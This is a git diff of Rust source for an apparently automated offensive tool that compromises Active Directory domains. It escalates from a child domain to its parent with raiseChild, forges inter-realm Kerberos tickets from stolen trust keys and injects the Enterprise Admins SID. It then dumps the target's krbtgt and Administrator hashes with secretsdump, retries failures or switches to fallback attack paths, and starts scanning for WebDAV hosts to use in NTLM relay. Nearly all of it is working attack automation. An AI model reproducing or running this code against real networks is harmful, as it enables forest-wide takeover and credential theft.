Ok(None) => { - debug!("Child-to-parent deferred by throttler"); } - Err(e) => { - warn!(err = %e, "Failed to dispatch child-to-parent escalation") + } + if !have_target_sid { + continue; + } + + // Resolve child domain SID if not cached (needed for ExtraSid golden ticket) + if !have_source_sid { + if let Some(ref child_dc) = child_dc_ip { + if let Some((sid, admin_name)) = + super::golden_ticket::resolve_domain_sid( + &child_domain, + child_dc, + child_admin_cred.as_ref(), + child_admin_hash.as_ref(), + ) + .await + { + info!( + child_domain = %child_domain, + sid = %sid, + "Resolved child domain SID via lookupsid for child-to-parent ExtraSid" + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let _ = reader.set_domain_sid(&mut conn, &cd_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &cd_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(cd_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(cd_lower.clone(), name.clone()); + } + } + payload["source_sid"] = json!(sid); + have_source_sid = true; + } else { + warn!( + child_domain = %child_domain, + child_dc_ip = %child_dc, + "Could not resolve child SID — deferring child-to-parent dispatch" + ); + } + } else { + warn!( + child_domain = %child_domain, + "No child DC IP available — deferring child-to-parent dispatch" + ); } } + if !have_source_sid { + continue; + } + + // Use raiseChild.py (impacket's canonical child→parent ExtraSid + // automation) via DIRECT tool dispatch (no LLM in the loop). + // This replaces the previous golden_ticket + secretsdump_kerberos + // combo, which fails because impacket's cross-realm referral is + // broken (fortra/impacket#315): a child-realm ticket presented + // to the parent KDC returns KDC_ERR_WRONG_REALM / + // KDC_ERR_PREAUTH_FAILED. raiseChild forges the inter-realm + // chain internally and dumps parent krbtgt + Administrator in + // one shot. + // + // Direct dispatch_tool bypasses the LLM agent loop entirely — + // the orchestrator owns every input (child admin hash, child + // DC IP, parent DC IP), so there is no value in laundering them + // through an LLM that might typo or omit args. + let admin_hash_value = child_admin_hash.as_ref().map(|h| h.hash_value.clone()); + let admin_password = child_admin_cred + .as_ref() + .map(|c| c.password.clone()) + .filter(|p| !p.is_empty()); + if admin_hash_value.is_none() && admin_password.is_none() { + warn!( + child_domain = %child_domain, + parent_domain = %parent_domain, + "No child Administrator hash or password — deferring child-to-parent (raise_child needs auth)" + ); + continue; + } + + // raiseChild auto-discovers parent forest root via the + // child DC's trustedDomain LDAP objects and resolves DC IPs + // via DNS — extra IP/domain flags are not supported and + // make argparse exit 2. + let mut raise_args = json!({ + "child_domain": child_domain.clone(), + "username": "Administrator", + }); + if let Some(h) = admin_hash_value { + raise_args["hash"] = json!(h); + } else if let Some(p) = admin_password { + raise_args["password"] = json!(p); + } + let _ = (&child_dc_ip, &parent_dc_ip); + + let call = ToolCall { + id: format!("raise_child_{}", uuid::Uuid::new_v4().simple()), + name: "raise_child".to_string(), + arguments: raise_args, + }; + let task_id = format!( + "trust_raise_child_{}", + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); + + // Mark dedup BEFORE spawning so the next 30s tick doesn't + // re-dispatch the same trust while raiseChild is running. + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key) + .await; + + info!( + task_id = %task_id, + child_domain = %child_domain, + parent_domain = %parent_domain, + auth = auth_method, + "Dispatching raise_child (direct tool, no LLM)" + ); + + // Spawn so the trust loop continues processing other items + // while raiseChild runs (typically 30–120s). mark_exploited + // is gated on observed parent krbtgt — no premature marking. + let dispatcher_bg = dispatcher.clone(); + let parent_domain_bg = parent_domain.clone(); + let child_domain_bg = child_domain.clone(); + let vuln_id_bg = vuln_id.clone(); + tokio::spawn(async move { + let result = dispatcher_bg + .llm_runner + .tool_dispatcher() + .dispatch_tool("privesc", &task_id, &call) + .await; + match result { + Ok(exec_result) => { + if let Some(err) = exec_result.error.as_ref() { + let tail: String = exec_result + .output + .chars() + .rev() + .take(2000) + .collect::() + .chars() + .rev() + .collect(); + warn!( + err = %err, + child_domain = %child_domain_bg, + parent_domain = %parent_domain_bg, + output_tail = %tail, + "raise_child returned error" + ); + return; + } + // Verify parent compromise — only mark exploited + // when we actually observe parent krbtgt. + // + // Inspect exec_result.discoveries directly: + // dispatch_tool returns BEFORE push_realtime_discoveries + // finishes pumping hashes into state.hashes, so reading + // state here is too early and produces a false negative. + let parent_lower = parent_domain_bg.to_lowercase(); + let has_parent_krbtgt = exec_result + .discoveries + .as_ref() + .and_then(|d| d.get("hashes")) + .and_then(|h| h.as_array()) + .map(|hashes| { + hashes.iter().any(|h| { + let user = h + .get("username") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let dom = h + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let htype = h + .get("hash_type") + .and_then(|v| v.as_str()) + .unwrap_or(""); + user.eq_ignore_ascii_case("krbtgt") + && dom.to_lowercase() == parent_lower + && htype.eq_ignore_ascii_case("ntlm") + }) + }) + .unwrap_or(false); + let tail_for_log: String = exec_result + .output + .chars() + .rev() + .take(2000) + .collect::() + .chars() + .rev() + .collect(); + if has_parent_krbtgt { + info!( + parent_domain = %parent_domain_bg, + "raise_child compromised parent — marking exploited" + ); + let _ = dispatcher_bg + .state + .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg) + .await; + let techniques = + vec!["T1134.005".to_string(), "T1003.006".to_string()]; + let event_id = format!( + "evt-raise-child-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "trust_automation", + "description": format!( + "Child-to-parent ExtraSid escalation: {} \u{2192} {} via raiseChild", + child_domain_bg, parent_domain_bg + ), + "mitre_techniques": techniques, + }); + let _ = dispatcher_bg + .state + .persist_timeline_event( + &dispatcher_bg.queue, + &event, + &techniques, + ) + .await; + } else { + warn!( + parent_domain = %parent_domain_bg, + output_tail = %tail_for_log, + "raise_child completed but no parent krbtgt observed — NOT marking exploited" + ); + } + } + Err(e) => { + warn!( + err = %e, + child_domain = %child_domain_bg, + parent_domain = %parent_domain_bg, + "raise_child dispatch errored" + ); + } + } + }); } } } @@ -557,11 +1176,10 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: } // Follow trust keys (inter-realm ticket + foreign secretsdump) - let (work, admin_cred_phase3, admin_hash_phase3): ( - Vec, - Option, - Option, - ) = { + // + // The deterministic forge uses only the trust key + SIDs (already on + // each TrustFollowWork item); admin creds are no longer needed here. + let work: Vec = { let state = dispatcher.state.read().await; // Skip if no domain admin yet — trust extraction requires DA-level creds @@ -578,29 +1196,6 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: .map(|t| (t.flat_name.to_uppercase(), t)) .collect(); - let admin_cred = state - .credentials - .iter() - .find(|c| c.is_admin && !c.password.is_empty()) - .cloned(); - // Find admin hash from any dominated domain with a DC - let admin_hash = if admin_cred.is_none() { - state - .domain_controllers - .keys() - .filter(|d| state.dominated_domains.contains(&d.to_lowercase())) - .find_map(|dom| { - state.hashes.iter().find(|h| { - h.username.to_lowercase() == "administrator" - && h.domain.to_lowercase() == dom.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - }) - }) - .cloned() - } else { - None - }; - let items = state .hashes .iter() @@ -609,9 +1204,7 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: return None; } - // Only process hashes that match a known trust account let netbios = hash.username.trim_end_matches('$').to_uppercase(); - let trust = trust_by_flat.get(&netbios)?; // Resolve source domain — fall back to first dominated domain // with a DC when secretsdump output lacks domain prefix @@ -628,24 +1221,44 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: if source_domain.is_empty() { return None; } + let source_lower = source_domain.to_lowercase(); + + // Resolve target FQDN: prefer explicit TrustInfo from LDAP + // enumeration, else derive from known domains where the + // NetBIOS label matches and the FQDN is not the source + // (filters out same-domain machine accounts). + let target_domain = if let Some(t) = trust_by_flat.get(&netbios) { + t.domain.clone() + } else { + state + .domain_controllers + .keys() + .chain(state.dominated_domains.iter()) + .find(|d| { + let dl = d.to_lowercase(); + dl != source_lower + && d.split('.') + .next() + .map(|label| label.to_uppercase() == netbios) + .unwrap_or(false) + }) + .cloned()? + }; let dedup_key = format!( "trust_follow:{}:{}", - source_domain.to_lowercase(), + source_lower, hash.username.to_lowercase() ); if state.is_processed(DEDUP_TRUST_FOLLOW, &dedup_key) { return None; } - // Use the FQDN from the trust relationship — never fall back - // to bare NetBIOS name which produces invalid domain strings. - let target_domain = trust.domain.clone(); - - let target_dc_ip = state - .domain_controllers - .get(&target_domain.to_lowercase()) - .cloned(); + // Use resolve_dc_ip so we fall back to the hosts table when + // domain_controllers lacks an explicit entry for the foreign + // domain — common for cross-forest trusts where the foreign + // DC is only known via host scan, not LDAP enumeration. + let target_dc_ip = state.resolve_dc_ip(&target_domain); let source_domain_sid = state .domain_sids @@ -656,11 +1269,6 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: .get(&target_domain.to_lowercase()) .cloned(); - let source_dc_ip = state - .domain_controllers - .get(&source_domain.to_lowercase()) - .cloned(); - Some(TrustFollowWork { dedup_key, hash: hash.clone(), @@ -669,20 +1277,34 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: target_dc_ip, source_domain_sid, target_domain_sid, - source_dc_ip, }) }) .collect(); - (items, admin_cred, admin_hash) + items }; for item in work { let vuln_id = forest_trust_vuln_id(&item.source_domain, &item.target_domain); - let trust_target = item - .target_dc_ip - .clone() - .unwrap_or_else(|| item.target_domain.clone()); + + // Defer dispatch when the target DC IP is unknown: impacket needs + // a routable -target-ip for both create_inter_realm_ticket and the + // forge-and-present secretsdump fallback. Passing the bare domain + // string fails fast and burns the dedup key. Re-tick in 30s and + // let host scans / trust enum populate the DC entry first. + let target_dc_ip = match item.target_dc_ip.clone() { + Some(ip) => ip, + None => { + debug!( + source = %item.source_domain, + target = %item.target_domain, + trust_account = %item.hash.username, + "Deferring forest trust escalation — target DC IP unresolved" + ); + continue; + } + }; + let trust_target = target_dc_ip.clone(); { let mut details = std::collections::HashMap::new(); details.insert( @@ -720,77 +1342,305 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: .await; } - // 1. Dispatch inter-realm ticket creation. - // Use field names that match the tool and prompt expectations: - // - `vuln_type` routes to generate_trust_key_prompt - // - `source_sid`/`target_sid` match create_inter_realm_ticket tool - // - `trusted_domain` is read by the trust prompt - // - Include admin creds + dc_ip so the LLM can call get_sid if SIDs are missing - let mut ticket_payload = json!({ - "technique": "create_inter_realm_ticket", - "vuln_type": "cross_forest", - "domain": item.source_domain, - "trusted_domain": item.target_domain, - "target_domain": item.target_domain, - "target": item.target_dc_ip.as_deref().unwrap_or(&item.target_domain), - "trust_key": item.hash.hash_value, - "trust_account": item.hash.username, - "vuln_id": &vuln_id, - }); - if let Some(ref sid) = item.source_domain_sid { - ticket_payload["source_sid"] = json!(sid); - } - if let Some(ref sid) = item.target_domain_sid { - ticket_payload["target_sid"] = json!(sid); - } - if let Some(ref aes) = item.hash.aes_key { - ticket_payload["aes_key"] = json!(aes); - } - if let Some(ref dc_ip) = item.source_dc_ip { - ticket_payload["dc_ip"] = json!(dc_ip); - } - if let Some(ref cred) = admin_cred_phase3 { - ticket_payload["username"] = json!(cred.username); - ticket_payload["password"] = json!(cred.password); - } else if let Some(ref hash) = admin_hash_phase3 { - ticket_payload["username"] = json!(hash.username); - ticket_payload["admin_hash"] = json!(hash.hash_value); + // Skip self-referential trust (source == target) + if item.source_domain.to_lowercase() == item.target_domain.to_lowercase() { + debug!( + source = %item.source_domain, + target = %item.target_domain, + "Skipping self-referential trust escalation" + ); + continue; } - match dispatcher - .throttled_submit("exploit", "privesc", ticket_payload, 1) - .await + // Suppress the ExtraSid forge when the trust has SID filtering + // active. ticketer adds Enterprise Admins (RID 519) via + // `--extra-sid` to satisfy DCSync — but a SID-filtered forest + // trust strips RID<1000 SIDs from the cross-realm PAC, and the + // target KDC returns rpc_s_access_denied. Burn the dedup so this + // doomed dispatch can't loop, mark the vuln exploited as a + // strategic choice, and wake the cross-forest fallback paths + // (ACL/MSSQL/FSP) to take over. { - Ok(Some(task_id)) => { + let state = dispatcher.state.read().await; + if is_filtered_inter_forest_trust(&state, &item.source_domain, &item.target_domain) + { info!( - task_id = %task_id, + source = %item.source_domain, + target = %item.target_domain, trust_account = %item.hash.username, - source_domain = %item.source_domain, - target_domain = %item.target_domain, - has_source_sid = item.source_domain_sid.is_some(), - has_target_sid = item.target_domain_sid.is_some(), - "Inter-realm ticket task dispatched" + "Suppressing forge_inter_realm_and_dump — SID filtering on cross-forest trust would reject ExtraSid; waking fallbacks" ); + drop(state); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_TRUST_FOLLOW, item.dedup_key.clone()); let _ = dispatcher .state - .mark_exploited(&dispatcher.queue, &vuln_id) + .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key) .await; - } - Ok(None) => { - debug!("Inter-realm ticket deferred by throttler"); + wake_cross_forest_fallbacks(&dispatcher, &item.target_domain).await; continue; } - Err(e) => { - warn!(err = %e, "Failed to dispatch inter-realm ticket"); - continue; + } + + // Forge-and-present the inter-realm TGT as a deterministic worker + // task — NOT an LLM task. Both `create_inter_realm_ticket` and + // `secretsdump_kerberos` run sequentially on the same worker via + // `expand_technique_task`, so the ccache file produced by ticketer + // is on the same filesystem when secretsdump reads it. + // + // Routing through the LLM here would launder deterministic values + // (NT hash, AES key, SIDs) through token generation — the LLM + // would have to copy them out of the rendered prompt into tool + // call args, where they get dropped, typo'd, or omitted. The + // orchestrator already owns every input; deliver them directly. + // + // Resolve the target DC hostname so Kerberos auth can match the + // SPN baked into the ticket. Falls back to the IP, which works + // when the worker can reverse-resolve via DNS. + let target_dc_hostname = { + let s = dispatcher.state.read().await; + s.hosts + .iter() + .find(|h| h.ip == target_dc_ip && !h.hostname.is_empty()) + .map(|h| h.hostname.clone()) + .or_else(|| { + s.hosts + .iter() + .find(|h| { + (h.is_dc || h.detect_dc()) + && h.hostname.to_lowercase().ends_with(&format!( + ".{}", + item.target_domain.to_lowercase() + )) + }) + .map(|h| h.hostname.clone()) + }) + .unwrap_or_else(|| target_dc_ip.clone()) + }; + + // ticketer writes .ccache in the worker cwd; the + // following secretsdump_kerberos call reads it via KRB5CCNAME. + let ticket_username = "Administrator"; + let ticket_path = format!("{ticket_username}.ccache"); + + // Resolve missing source SID via lookupsid against the source + // DC. ticketer.py needs `--domain-sid` for the source realm to + // build a valid PAC; without it the resulting ticket gets + // rejected by the target KDC. We have DA on the source domain + // (cross-forest forge only fires after DA), so SAMR lookupsid + // works with either a password cred or admin NTLM hash. + let source_domain_sid = if item.source_domain_sid.is_some() { + item.source_domain_sid.clone() + } else { + let (source_dc_ip, src_cred, src_hash) = { + let s = dispatcher.state.read().await; + let src_lower = item.source_domain.to_lowercase(); + let dc = s.resolve_dc_ip(&item.source_domain); + let cred = s + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && c.domain.to_lowercase() == src_lower + }) + .cloned(); + let h = s + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == "administrator" + && h.domain.to_lowercase() == src_lower + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned(); + (dc, cred, h) + }; + let resolved = if let Some(ref dc_ip) = source_dc_ip { + super::golden_ticket::resolve_domain_sid( + &item.source_domain, + dc_ip, + src_cred.as_ref(), + src_hash.as_ref(), + ) + .await + } else { + None + }; + if let Some((sid, admin_name)) = resolved { + info!( + source_domain = %item.source_domain, + sid = %sid, + "Resolved source domain SID for cross-forest forge" + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let src_lower = item.source_domain.to_lowercase(); + let _ = reader.set_domain_sid(&mut conn, &src_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &src_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(src_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(src_lower, name.clone()); + } + } + Some(sid) + } else { + warn!( + source = %item.source_domain, + target = %item.target_domain, + "Could not resolve source SID — deferring cross-forest forge" + ); + None + } + }; + if source_domain_sid.is_none() { + continue; + } + + // For child→parent forges we MUST inject the parent's Enterprise + // Admins SID (RID 519) as ExtraSid; without it the parent KDC + // issues a TGS but DRSUAPI on the parent DC rejects the + // replication call as `rpc_s_access_denied` and nxc dumps zero + // hashes (exit 0, hiding the failure). Resolve the parent SID + // on-demand via lookupsid against the parent DC using source + // admin creds (cross-trust SAMR works) when it isn't cached. + // Defer dispatch (no dedup mark) when resolution fails so the + // next 30s tick can retry once enumeration progresses. + let source_l = item.source_domain.to_lowercase(); + let target_l = item.target_domain.to_lowercase(); + let is_child_to_parent = + source_l != target_l && source_l.ends_with(&format!(".{target_l}")); + let target_domain_sid: Option = + if !is_child_to_parent || item.target_domain_sid.is_some() { + item.target_domain_sid.clone() + } else { + let (src_cred, src_hash) = { + let s = dispatcher.state.read().await; + let src_lower = item.source_domain.to_lowercase(); + let cred = s + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && c.domain.to_lowercase() == src_lower + }) + .cloned(); + let h = s + .hashes + .iter() + .find(|h| { + h.username.to_lowercase() == "administrator" + && h.domain.to_lowercase() == src_lower + && h.hash_type.to_uppercase() == "NTLM" + }) + .cloned(); + (cred, h) + }; + let resolved = super::golden_ticket::resolve_domain_sid( + &item.target_domain, + &target_dc_ip, + src_cred.as_ref(), + src_hash.as_ref(), + ) + .await; + if let Some((sid, admin_name)) = resolved { + info!( + target_domain = %item.target_domain, + sid = %sid, + "Resolved parent domain SID for child→parent forge ExtraSid" + ); + let op_id = { dispatcher.state.read().await.operation_id.clone() }; + let reader = ares_core::state::RedisStateReader::new(op_id); + let mut conn = dispatcher.queue.connection(); + let tgt_lower = item.target_domain.to_lowercase(); + let _ = reader.set_domain_sid(&mut conn, &tgt_lower, &sid).await; + if let Some(ref name) = admin_name { + let _ = reader.set_admin_name(&mut conn, &tgt_lower, name).await; + } + { + let mut state = dispatcher.state.write().await; + state.domain_sids.insert(tgt_lower.clone(), sid.clone()); + if let Some(ref name) = admin_name { + state.admin_names.insert(tgt_lower, name.clone()); + } + } + Some(sid) + } else { + warn!( + source = %item.source_domain, + target = %item.target_domain, + target_dc_ip = %target_dc_ip, + "Could not resolve parent SID — deferring child→parent forge" + ); + None + } + }; + if is_child_to_parent && target_domain_sid.is_none() { + continue; + } + + // Build args for the combined `forge_inter_realm_and_dump` tool. + // This single tool runs impacket-ticketer + impacket-secretsdump + // sequentially in one worker invocation (shared tempdir as cwd), + // so the .ccache produced by ticketer is on the same filesystem + // when secretsdump reads it. Two split dispatch_tool calls would + // land on different worker pods with no shared FS. + let mut tool_args = json!({ + "source_domain": &item.source_domain, + "target_domain": &item.target_domain, + "trust_key": &item.hash.hash_value, + "username": ticket_username, + // `target` is the DC hostname (or IP fallback) for the SPN + // baked into the ticket; `dc_ip` is the routable IP used + // for impacket-secretsdump's `-dc-ip`. + "target": &target_dc_hostname, + "dc_ip": &target_dc_ip, + }); + if let Some(ref sid) = source_domain_sid { + tool_args["source_sid"] = json!(sid); + } + if let Some(ref sid) = target_domain_sid { + tool_args["target_sid"] = json!(sid); + } + // AES256 trust key — required for Win2016+ target DCs which + // reject RC4-only inter-realm tickets with KDC_ERR_TGT_REVOKED. + if let Some(ref aes) = item.hash.aes_key { + tool_args["aes_key"] = json!(aes); + } + // For child→parent trusts (intra-forest), inject parent's + // Enterprise Admins SID (RID 519). SID filtering blocks + // ExtraSID across forest trusts, so only emit on intra-forest. + // The defer above guarantees target_domain_sid is Some here + // when is_child_to_parent. + if is_child_to_parent { + if let Some(ref tsid) = target_domain_sid { + tool_args["extra_sid"] = json!(format!("{tsid}-519")); } } + let _ = ticket_path; // ccache path is internal to the tool + let _ = trust_target; - // The privesc agent handles the full flow: forge inter-realm ticket → - // secretsdump_kerberos against the target DC. No separate credential_access - // dispatch needed (it lacked valid auth and always failed). + let call = ToolCall { + id: format!("forge_inter_realm_{}", uuid::Uuid::new_v4().simple()), + name: "forge_inter_realm_and_dump".to_string(), + arguments: tool_args, + }; + let task_id = format!( + "trust_forge_{}", + &uuid::Uuid::new_v4().simple().to_string()[..12] + ); - // Mark as processed + // Mark dedup BEFORE spawning so the next 30s tick doesn't + // re-dispatch the same trust while the forge is running. dispatcher .state .write() @@ -800,6 +1650,152 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch: .state .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &item.dedup_key) .await; + + info!( + task_id = %task_id, + trust_account = %item.hash.username, + source_domain = %item.source_domain, + target_domain = %item.target_domain, + has_source_sid = source_domain_sid.is_some(), + has_target_sid = item.target_domain_sid.is_some(), + has_aes = item.hash.aes_key.is_some(), + "Cross-forest forge dispatched (direct tool, no LLM)" + ); + + let dispatcher_bg = dispatcher.clone(); + let source_domain_bg = item.source_domain.clone(); + let target_domain_bg = item.target_domain.clone(); + let trust_account_bg = item.hash.username.clone(); + let vuln_id_bg = vuln_id.clone(); + let dedup_key_bg = item.dedup_key.clone(); + tokio::spawn(async move { + let result = dispatcher_bg + .llm_runner + .tool_dispatcher() + .dispatch_tool("privesc", &task_id, &call) + .await; + // Clear dedup on failure so the next 30s tick can retry once + // a fresh trust key, AES key, or SID becomes available. + let clear_dedup = || async { + dispatcher_bg + .state + .write() + .await + .unmark_processed(DEDUP_TRUST_FOLLOW, &dedup_key_bg); + let _ = dispatcher_bg + .state + .unpersist_dedup(&dispatcher_bg.queue, DEDUP_TRUST_FOLLOW, &dedup_key_bg) + .await; + }; + match result { + Ok(exec_result) => { + if let Some(err) = exec_result.error.as_ref() { + let tail: String = exec_result + .output + .chars() + .rev() + .take(2000) + .collect::() + .chars() + .rev() + .collect(); + warn!( + err = %err, + source_domain = %source_domain_bg, + target_domain = %target_domain_bg, + trust_account = %trust_account_bg, + output_tail = %tail, + "forge_inter_realm_and_dump returned error — clearing dedup for retry" + ); + clear_dedup().await; + return; + } + // Verify target compromise — only mark exploited + // when we actually observe the target krbtgt hash + // in the dispatch_tool discoveries. + let target_lower = target_domain_bg.to_lowercase(); + let has_target_krbtgt = exec_result + .discoveries + .as_ref() + .and_then(|d| d.get("hashes")) + .and_then(|h| h.as_array()) + .map(|hashes| { + hashes.iter().any(|h| { + let user = + h.get("username").and_then(|v| v.as_str()).unwrap_or(""); + let dom = + h.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + let htype = + h.get("hash_type").and_then(|v| v.as_str()).unwrap_or(""); + user.eq_ignore_ascii_case("krbtgt") + && dom.to_lowercase() == target_lower + && htype.eq_ignore_ascii_case("ntlm") + }) + }) + .unwrap_or(false); + if has_target_krbtgt { + info!( + source_domain = %source_domain_bg, + target_domain = %target_domain_bg, + "Cross-forest forge compromised target — marking exploited" + ); + let _ = dispatcher_bg + .state + .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg) + .await; + let techniques = vec!["T1134.005".to_string(), "T1550.003".to_string()]; + let event_id = format!( + "evt-trust-{}", + &uuid::Uuid::new_v4().simple().to_string()[..8] + ); + let event = serde_json::json!({ + "id": event_id, + "timestamp": chrono::Utc::now().to_rfc3339(), + "source": "trust_automation", + "description": format!( + "Forest trust escalation: {} \u{2192} {} via trust key {}", + source_domain_bg, target_domain_bg, trust_account_bg + ), + "mitre_techniques": techniques, + }); + let _ = dispatcher_bg + .state + .persist_timeline_event(&dispatcher_bg.queue, &event, &techniques) + .await; + } else { + // Tool ran cleanly but no target krbtgt landed in + // discoveries — this is a deterministic failure + // (SID filtering, denied permissions, or wrong + // forest) that won't change on the next 30s tick. + // Keep dedup MARKED so we don't relitigate the + // doomed forge in a tight loop, mark the trust + // vuln exploited so the operation moves on, and + // wake the cross-forest fallback paths + // (ACL/MSSQL/FSP) which can still compromise the + // target forest without ExtraSid. + warn!( + source_domain = %source_domain_bg, + target_domain = %target_domain_bg, + "forge_inter_realm_and_dump completed but no target krbtgt observed — locking dedup, waking fallbacks" + ); + let _ = dispatcher_bg + .state + .mark_exploited(&dispatcher_bg.queue, &vuln_id_bg) + .await; + wake_cross_forest_fallbacks(&dispatcher_bg, &target_domain_bg).await; + } + } + Err(e) => { + warn!( + err = %e, + source_domain = %source_domain_bg, + target_domain = %target_domain_bg, + "forge_inter_realm_and_dump dispatch errored — clearing dedup for retry" + ); + clear_dedup().await; + } + } + }); } } } @@ -812,7 +1808,6 @@ struct TrustFollowWork { target_dc_ip: Option, source_domain_sid: Option, target_domain_sid: Option, - source_dc_ip: Option, } #[cfg(test)] @@ -958,4 +1953,114 @@ mod tests { assert_eq!(trust_enum_dedup_key("", false), "trust_enum:"); assert_eq!(trust_enum_dedup_key("", true), "trust_enum_hash:"); } + + // is_filtered_inter_forest_trust + + fn state_with_trust(domain: &str, trust: ares_core::models::TrustInfo) -> StateInner { + let mut s = StateInner::new("op-test".into()); + s.trusted_domains.insert(domain.to_lowercase(), trust); + s + } + + #[test] + fn filtered_inter_forest_intra_forest_returns_false() { + let s = StateInner::new("op-test".into()); + // child↔parent — not inter-forest, never filtered. + assert!(!is_filtered_inter_forest_trust( + &s, + "child.contoso.local", + "contoso.local" + )); + } + + #[test] + fn filtered_inter_forest_explicit_filtering_on() { + let trust = ares_core::models::TrustInfo { + domain: "fabrikam.local".into(), + flat_name: "FABRIKAM".into(), + direction: "bidirectional".into(), + trust_type: "forest".into(), + sid_filtering: true, + }; + let s = state_with_trust("fabrikam.local", trust); + assert!(is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_explicit_filtering_off() { + let trust = ares_core::models::TrustInfo { + domain: "fabrikam.local".into(), + flat_name: "FABRIKAM".into(), + direction: "bidirectional".into(), + trust_type: "forest".into(), + sid_filtering: false, + }; + let s = state_with_trust("fabrikam.local", trust); + assert!(!is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_no_metadata_tries_forge() { + let s = StateInner::new("op-test".into()); + // No TrustInfo for the target. Without explicit filtering metadata we + // try the forge — the cost of an unnecessary attempt (~30s) is cheaper + // than silently dropping a valid attack on a misconfigured trust. + assert!(!is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_ignores_unrelated_source_metadata() { + // Repro of op-20260429-111016 bug: north discovered its parent trust + // and stored TrustInfo{ domain="sevenkingdoms.local", parent_child, + // sid_filtering=false }. Querying the unrelated cross-forest path + // sevenkingdoms.local → essos.local must NOT be answered with that + // parent_child entry (which would wrongly classify the cross-forest + // path as intra-forest). With no metadata for the actual target we + // now try the forge rather than silently suppressing it. + let parent_trust = ares_core::models::TrustInfo { + domain: "contoso.local".into(), + flat_name: "CONTOSO".into(), + direction: "bidirectional".into(), + trust_type: "parent_child".into(), + sid_filtering: false, + }; + let s = state_with_trust("contoso.local", parent_trust); + // Target fabrikam.local has no metadata — try the forge. + assert!(!is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } + + #[test] + fn filtered_inter_forest_target_metadata_authoritative() { + // When the target's TrustInfo says cross-forest with SID filtering, + // suppress the forge regardless of any source-side parent_child entry. + let target_trust = ares_core::models::TrustInfo { + domain: "fabrikam.local".into(), + flat_name: "FABRIKAM".into(), + direction: "bidirectional".into(), + trust_type: "forest".into(), + sid_filtering: true, + }; + let s = state_with_trust("fabrikam.local", target_trust); + assert!(is_filtered_inter_forest_trust( + &s, + "contoso.local", + "fabrikam.local" + )); + } } diff --git a/ares-cli/src/orchestrator/automation/webdav_detection.rs b/ares-cli/src/orchestrator/automation/webdav_detection.rs new file mode 100644 index 00000000..f5e29c67 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/webdav_detection.rs @@ -0,0 +1,699 @@ +//! auto_webdav_detection -- detect WebDAV on hosts for NTLM relay. +//! +//! Hosts running WebClient service (WebDAV) accept HTTP-based NTLM auth, +//! which bypasses SMB signing requirements. This enables relay attacks +//! (HTTP→LDAP/SMB) even when SMB signing is enforced. WebDAV is commonly +//! enabled on IIS servers and member servers with WebClient service. +//! +//! This is a bridge module (like smb_signing.rs): it checks discovered hosts +//! for WebDAV indicators and registers `webdav_enabled` vulnerabilities +//! that downstream modules (ntlm_relay) can target. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::state::*; + +/// Collect WebDAV work items from state (pure logic, no async). +fn collect_webdav_work(state: &StateInner) -> Vec { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Skip DCs (WebDAV relay is for member servers) + if host.is_dc { + continue; + } + + // Check if host has WebDAV indicators in services + let has_webdav = host.services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("webdav") + || sl.contains("webclient") + || sl.contains("iis") + || (sl.contains("80/") && sl.contains("http")) + }); + + if !has_webdav { + continue; + } + + let dedup_key = format!("webdav:{}", host.ip); + if state.is_processed(DEDUP_WEBDAV_DETECTION, &dedup_key) { + continue; + } + + // Check if vuln already registered + let vuln_id = format!("webdav_enabled_{}", host.ip.replace('.', "_")); + if 